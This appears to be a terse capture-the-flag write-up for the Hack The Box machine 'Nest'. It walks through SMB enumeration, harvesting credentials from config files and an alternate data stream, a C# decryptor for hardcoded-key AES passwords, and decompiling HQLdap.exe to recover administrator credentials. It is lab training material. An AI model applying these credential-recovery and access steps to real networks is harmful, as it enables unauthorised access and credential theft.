Nest
- Commands can be run by adding -C flag (automatically sends CRLF) in nc nc -Cv nest.htb 4386 telnet nest.htb 4386 - SMB Share with some sort of misconfiguration smbclient -U '' -L nest.htb get "<filename-with-spaces>" - Listing directories and files recursively smbmap -H 10.10.10.178 -u '' -R smbmap -H 10.10.10.178 -u '[redacted]' -p '[redacted]' -R - Downloading files ending with .xml smbmap -H 10.10.10.178 -u '[redacted]' -p '[redacted]' -R -A '.xml' cat 10.10.10.178-Data_IT_Configs_RU\ Scanner_RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>[redacted]</Username> <Password>[redacted]</Password> </ConfigFile> - Password is encrypted string [Didn't work] smbclient -U "[redacted]%$(echo '[redacted]' | base64 -d)" nest.htb -L - SMB root folder not accessible but child folder 'Carl' is
cat 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> - Decrypting user password - Convert the file 'Utils.vb' to a C# file. https://converter.telerik.com/ Note: tried 'wine64 cscript Utils.vb' to compile but there were errors [to-do?] - Add 'public static void Main' to the 'Utils' class and create an object to call the decrypt function. Remove 'static' from the 'DecryptString' function so it can be called on that object.
using System;
using System.Text;
using System.Security.Cryptography;
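/// <summary>
/// C# port of the Utils.vb helper described in the surrounding notes: AES-CBC encryption and
/// decryption of short strings with a key derived from a passphrase via Rfc2898DeriveBytes.
/// </summary>
/// <remarks>
/// NOTE(review): the passphrase, salt, IV and iteration count used by
/// <see cref="DecryptString"/> and <see cref="EncryptString"/> are compiled into the program.
/// Anyone who can read the binary or its source can therefore recover every value protected
/// with them, so a "Password" field stored this way is obfuscated rather than protected.
/// A fixed IV with CBC also makes equal plaintexts produce equal ciphertexts, and two PBKDF2
/// iterations add no meaningful work factor. Defensive takeaway: keep service credentials in
/// an OS-protected store (for example DPAPI or a secrets manager) and restrict read access to
/// configuration shares.
/// </remarks>
public class Utils
{
    // Fixed parameters shared by EncryptString and DecryptString (values taken from the page).
    private const string PassPhrase = "N3st22";
    private const string SaltValue = "88552299";
    private const int PasswordIterations = 2;
    private const string InitVector = "464R5DFA5DL6LE28";
    private const int KeySize = 256;

    /// <summary>Returns the path of "Log.txt" inside the current working directory.</summary>
    public static string GetLogFilePath()
    {
        return System.IO.Path.Combine(Environment.CurrentDirectory, "Log.txt");
    }

    /// <summary>
    /// Decrypts a Base64 ciphertext with the built-in parameters.
    /// </summary>
    /// <param name="EncryptedString">Base64 text as produced by <see cref="EncryptString"/>.</param>
    /// <returns>The decrypted text, or an empty string when the input is null or empty.</returns>
    public string DecryptString(string EncryptedString)
    {
        if (string.IsNullOrEmpty(EncryptedString))
        {
            return string.Empty;
        }

        return Decrypt(EncryptedString, PassPhrase, SaltValue, PasswordIterations, InitVector, KeySize);
    }

    /// <summary>
    /// Encrypts a string with the built-in parameters.
    /// </summary>
    /// <param name="PlainString">Text to encrypt; it is encoded as ASCII before encryption.</param>
    /// <returns>Base64 ciphertext, or an empty string when the input is null or empty.</returns>
    public static string EncryptString(string PlainString)
    {
        if (string.IsNullOrEmpty(PlainString))
        {
            return string.Empty;
        }

        return Encrypt(PlainString, PassPhrase, SaltValue, PasswordIterations, InitVector, KeySize);
    }

    /// <summary>
    /// Encrypts <paramref name="plainText"/> with AES in CBC mode and returns Base64 text.
    /// </summary>
    /// <param name="plainText">Text to encrypt (ASCII-encoded).</param>
    /// <param name="passPhrase">Passphrase fed to Rfc2898DeriveBytes.</param>
    /// <param name="saltValue">Salt (ASCII-encoded) for the key derivation.</param>
    /// <param name="passwordIterations">Iteration count for the key derivation.</param>
    /// <param name="initVector">IV (ASCII-encoded) passed to the AES encryptor.</param>
    /// <param name="keySize">Key size in bits; keySize / 8 bytes are derived.</param>
    /// <returns>The ciphertext encoded as Base64.</returns>
    public static string Encrypt(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
    {
        byte[] initVectorBytes = Encoding.ASCII.GetBytes(initVector);
        byte[] saltValueBytes = Encoding.ASCII.GetBytes(saltValue);
        byte[] plainTextBytes = Encoding.ASCII.GetBytes(plainText);

        // Every cryptographic object is disposed deterministically; the original left the
        // key-derivation object, the AES provider and the transform undisposed.
        using (Rfc2898DeriveBytes password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations))
        using (AesCryptoServiceProvider symmetricKey = new AesCryptoServiceProvider())
        {
            byte[] keyBytes = password.GetBytes(System.Convert.ToInt32(keySize / (double)8));
            symmetricKey.Mode = CipherMode.CBC;

            using (ICryptoTransform encryptor = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes))
            using (System.IO.MemoryStream memoryStream = new System.IO.MemoryStream())
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, encryptor, CryptoStreamMode.Write))
            {
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length);
                // The final padded block must be flushed before the buffer is copied out.
                cryptoStream.FlushFinalBlock();
                return Convert.ToBase64String(memoryStream.ToArray());
            }
        }
    }

    /// <summary>
    /// Decrypts Base64 text produced by <see cref="Encrypt"/> with the same parameters.
    /// </summary>
    /// <param name="cipherText">Base64-encoded ciphertext.</param>
    /// <param name="passPhrase">Passphrase fed to Rfc2898DeriveBytes.</param>
    /// <param name="saltValue">Salt (ASCII-encoded) for the key derivation.</param>
    /// <param name="passwordIterations">Iteration count for the key derivation.</param>
    /// <param name="initVector">IV (ASCII-encoded) passed to the AES decryptor.</param>
    /// <param name="keySize">Key size in bits; keySize / 8 bytes are derived.</param>
    /// <returns>The decrypted bytes decoded as ASCII.</returns>
    /// <exception cref="FormatException">The input is not valid Base64.</exception>
    /// <exception cref="CryptographicException">The ciphertext cannot be decrypted with the given parameters.</exception>
    public static string Decrypt(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
    {
        byte[] initVectorBytes = Encoding.ASCII.GetBytes(initVector);
        byte[] saltValueBytes = Encoding.ASCII.GetBytes(saltValue);
        byte[] cipherTextBytes = Convert.FromBase64String(cipherText);

        using (Rfc2898DeriveBytes password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations))
        using (AesCryptoServiceProvider symmetricKey = new AesCryptoServiceProvider())
        {
            byte[] keyBytes = password.GetBytes(System.Convert.ToInt32(keySize / (double)8));
            symmetricKey.Mode = CipherMode.CBC;

            using (ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes))
            using (System.IO.MemoryStream input = new System.IO.MemoryStream(cipherTextBytes))
            using (CryptoStream cryptoStream = new CryptoStream(input, decryptor, CryptoStreamMode.Read))
            using (System.IO.MemoryStream output = new System.IO.MemoryStream())
            {
                // A single Read call may return fewer bytes than were requested, which would
                // silently truncate the plaintext; CopyTo keeps reading until the stream ends.
                cryptoStream.CopyTo(output);
                return Encoding.ASCII.GetString(output.ToArray());
            }
        }
    }

    /// <summary>
    /// Console entry point added for the writeup: decrypts one value and prints it.
    /// </summary>
    public static void Main(string[] args)
    {
        Console.WriteLine ("Hello Mono World");
        Utils dec = new Utils();
        // "[redacted]" is the page's placeholder for the Base64 value from the config file;
        // as written it is not valid Base64, so Convert.FromBase64String throws FormatException.
        string temp = dec.DecryptString("[redacted]");
        Console.WriteLine(temp);
    }
}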
- mcs Utils.cs - mono Utils.exe - smbclient -U '[redacted]%[redacted]' //10.10.10.178/Users - Fetching Debug password https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ - smbclient -U '[redacted]%[redacted]' //10.10.10.178/Users - allinfo "Debug Mode Password.txt" - get "Debug Mode Password.txt:Password" Debug mode password - [redacted] - LDAP Data - setdir ..\ldap - showquery 2 [Ldap.conf] Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=[redacted] - Decompiling HQLdap.exe - ilspy - Open HQLdap.exe
- Save code for class "CR" - Add the following code inside the class "CR":
// Entry point pasted into the decompiled CR class so that its static DS routine can be
// run on its own. The argument is the Base64 value used on the page.
// NOTE(review): presumably DS is the class's decrypt routine for the Ldap.conf
// Password field — confirm against the decompiled source.
public static void Main(string[] args)
{
    Console.WriteLine("Program Running");

    // DS is invoked statically, so this instance is not used by the call; it is
    // constructed only because the original snippet constructs it.
    CR instance = new CR();

    string decoded = CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=");
    Console.WriteLine(decoded);
}
- mcs CR.cs - mono CR.exe - Accessing Administrator directory - smbclient -U 'administrator%[redacted]' //10.10.10.178/C$ - cd Users/Administrator/Desktop/ - get flag.txt -